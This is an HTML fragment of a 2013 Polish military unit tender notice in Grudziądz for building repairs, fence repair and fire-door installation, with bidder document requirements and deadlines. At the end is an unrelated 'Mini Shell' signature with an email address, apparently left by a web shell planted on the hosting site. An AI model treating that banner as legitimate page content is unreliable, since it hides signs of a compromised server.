<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>w zadaniu nr 1: dwie najważniejsze wykonane roboty w zakresie ogólnobudowlanym - każda 
z wykazanych robót winna stanowić co najmniej kwotę 50.000,00 zł (wzór: Załącznik Nr 9 doSIWZ)
w zadaniu nr 2: dwie najważniejsze wykonane roboty w zakresie ogólnobudowlanym - każda 
z wykazanych robót winna stanowić co najmniej kwotę 50.000,00 zł (wzór: Załącznik Nr 9 do SIWZ)
w zadaniu nr 3: dwie najważniejsze wykonane roboty w zakresie ogólnobudowlanym - każda 
z wykazanych robót winna stanowić co najmniej kwotę 50.000,00 zł (wzór: Załącznik Nr 9 do SIWZ)
Wykonawca składa wraz z ofertą wykaz robót wraz z dowodami, że roboty zostały wykonane 
w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone 
z zastrzeżeniem § 9 ust. 2 Rozporządzenia Prezesa Rady Ministrów z 19.02.2013 r. w sprawie rodzajów dokumentów, jakich
może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. poz. 231).  	Wykonawca może przedłożyć dowody: Poświadczenie i inne dokumenty, jeżeli Wykonawca z uzasadnionych przyczyn o obiektywnym charakterze nie jest w stanie uzyskać poświadczenia;
b)W przypadku gdy Zamawiający jest podmiotem, na rzecz, którego roboty budowlane wskazane przez Wykonawcę w wykazie (Rozdział VII ust. 3 pkt. 2) były wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa.
c)Zamawiający zastrzega, iż szczególnie w przypadku gdy wykaz lub dowody będą budzić wątpliwości Zamawiającego lub gdy z poświadczenia albo innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz, którego roboty budowlane były wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu.;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu wykazania spełnienia przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 Ustawy w zw. Rozdziałem VI ust. 1 Ustawy,
Zamawiający żąda przedłożenia w treści oferty (Podstawa: § 1 ust. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r.  w
sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. poz. 231):Oświadczenie o posiadaniu zezwoleń wynikających z ustawy o odpadach i spełnieniu przez Wykonawcę wymogów ustawy z dnia 14.12.2012 r. o odpadach (Dz.U. 2013, poz. 21
z późn.zm.) według treści Załącznika Nr 10 SIWZ. Wykonawca wraz z ofertą winien przedłożyć:
Załącznik Nr 4- Kosztorys ofertowy - zadanie nr 1;
Załącznik Nr 5- Kosztorys ofertowy - zadanie nr 2;
Załącznik Nr 6- Kosztorys ofertowy - zadanie nr 3;
Załącznik Nr 8- Oświadczenie o spełnieniu warunków udziału;
Załącznik Nr 9- Wykaz robót budowlanych;
Załącznik Nr 11- Oświadczenie o spełnieniu wymagań w zakresie uprawnień i kwalifikacji;
Załącznik Nr 12- Oświadczenie o braku podstaw wykluczenia w postępowaniu;
Załącznik Nr 13- Oświadczenie o przynależności do grupy kapitałowej;
Załącznik Nr 14- Wykaz części jakie Wykonawca zamierza powierzyć podwykonawcom;
Załącznik Nr 16- Informacja o Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 ustawy przewiduje możliwość wprowadzenia zmian do treści zawartej umowy w
stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, jeżeli konieczność wprowadzenia takich zmian
wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla
Zamawiającego  w zakresie:
1)podwykonawcy uczestniczącego w realizacji umowy w wypadku kiedy Wykonawca określi go co do tożsamości w ofercie
za pisemną zgodą Zamawiającego oraz zgodnie z treścią art. 6471 KC 
i postanowieniami umowy;
2)zmiany terminu rozpoczęcia prac budowlanych i/lub ich zakończenia jeżeli z przyczyn organizacyjnych leżących po stronie Zamawiającego ich rozpoczęcie w wyznaczonym terminie było niemożliwe;
3)zmiany osób kierujących robotami po stronie Wykonawcy, pod warunkiem spełnienia wymagań 
w zakresie niezbędnych uprawnień i kwalifikacji określonych w Rozdziale VI SIWZ.
Zmiany jak powyżej wymagają zachowania formy pisemnej (aneks) oraz pisemnego wniosku jednej ze Stron o zmianę wraz z uzasadnieniem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.13wog.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Z kasy JW 4503 ul. Czwartaków 1, 86-300 Grudziądz:7 zł na wniosek Wykonawcy - wysyłka:14,15 zł lub bezpłatnie z www.13wog.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.11.2013 godzina 11:30, miejsce: Kancelaria JW 4503 ul. Czwartaków1, 86-300 Grudziądz (budynek1, pokój 7) - osobiście lub przesyłką, wykonawca uwzględnia czas niezbędny na dostarczenie ofert bezpośrednio do kancelarii..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Kopertę należy opisać hasłem: 
OFERTA PRZETARGOWA: 
REMONT KLATEK SCHODOWYCH I POMIESZCZEŃ PRZY UL. LEGIONÓW
W GRUDZIĄDZU, REMONT CZĘŚCI OGRODZENIA KOMPLEKSU PRZY UL. BEMA 
W GRUDZIĄDZU, MONTAŻ DRZWI P.POŻ W BUDYNKU NR 18 PRZY UL. CZWARTAKÓW W GRUDZIĄDZU
sprawa nr 95/2013 nie otwierać do dnia 12.11.2013 r. do godziny 12:00
Na kopercie umieścić należy w postaci pieczęci firmowej lub odręcznego napisu  nazwę Wykonawcy i jego adres zgodnie z danymi rejestrowymi (ewidencyjnymi).
Konsekwencje złożenia oferty niezgodnie z opisem (np. potraktowanie oferty jako zwykłej korespondencji 
i niedostarczenie jej na miejsce składania ofert w terminie jak w SIWZ) ponosi Wykonawca..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont klatek schodowych i pomieszczeń biurowych
w budynku nr 21 i 28 w kompleksie przy ul. Legionów 
w Grudziądzu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont klatek schodowych i pomieszczeń biurowych
w budynku nr 21 i 28 w kompleksie przy ul. Legionów 
w Grudziądzu.ROBOTY:konserwacja malarska pomieszczeń biurowych;ułożenie płytek na klatce schodowej;wymiana wykładzin oraz ułożenie paneli podłogowych w pomieszczeniach biurowych;wymiana opraw oświetleniowych;wykonanie podziału pomieszczenia kancelarii tajnej przegrodą PCV. WYSZCZEGÓLNIENIE I OPIS PRAC TOWARZYSZĄCYCH. Wykonawca zabezpiecza we własnym zakresie i na swój koszt:wydzielenie etapów robót;oświetlenie terenu prowadzonych robót;poręcze, mostki, daszki i zabezpieczenia na terenie robót;znaki informacyjne i ostrzegawcze na terenie prowadzonych robót;wykonanie i utrzymanie zaplecza socjalnego i magazynowego budowy;i zabezpieczenie instalacji i urządzeń na terenie robót;wykonanie rusztowań niezbędnych do wykonania robót..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.44.21.00-8, 45.43.12.00-9, 45.31.00.00-3, 90.50.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont części ogrodzenia kompleksu wojskowego przy ul. Bema w Grudziądzu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont części ogrodzenia kompleksu wojskowego przy ul. Bema w Grudziądzu
ROBOTY BUDOWLANE:remont części ogrodzenia kompleksu wojskowego przy ul. Bema  - odcinek odrodzenia od ul. Legionów.WYSZCZEGÓLNIENIE I OPIS PRAC TOWARZYSZĄCYCH
Wykonawca zabezpiecza we własnym zakresie i na swój koszt:znaki ostrzegawcze na terenie robót;wykonanie i utrzymanie zaplecza budowy;oznaczenie i zabezpieczenie instalacji i urządzeń na terenie robót..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.44.21.00-8, 45.34.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Montaż drzwi przeciwpożarowych w budynku nr 18
w kompleksie przy ul Czwartaków w Grudziądzu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Montaż drzwi przeciwpożarowych w budynku nr 18 w kompleksie przy ul Czwartaków w Grudziądzu.
ROBOTY WEWNĘTRZNE:wykonanie ścianek z cegły pełnej i dziurawki ułożenie nadproży prefabrykowanych typu L19;osadzenie drzwi przeciwpożarowych przekazanych od inwestora;wykonanie tynków cementowo - wapiennych na wykonanych ściankach;wykonanie gładzi gipsowych oraz roboty malarskie w obrębie wykonanych ścianek.WYSZCZEGÓLNIENIE I OPIS PRAC TOWARZYSZĄCYCH Wykonawca zabezpiecza we własnym zakresie i na swój koszt:ogrodzenie etapów  robót;oświetlenie terenu robót;poręcze, mostki, daszki, i zabezpieczenia na terenie robót;znaki ostrzegawcze na terenie robót;oznaczenie i zabezpieczenie instalacji i urządzeń na terenie robót;wykonanie rusztowań niezbędnych do wykonania robót..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.31-1, 45.26.25.22-6, 45.41.00.00-4, 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com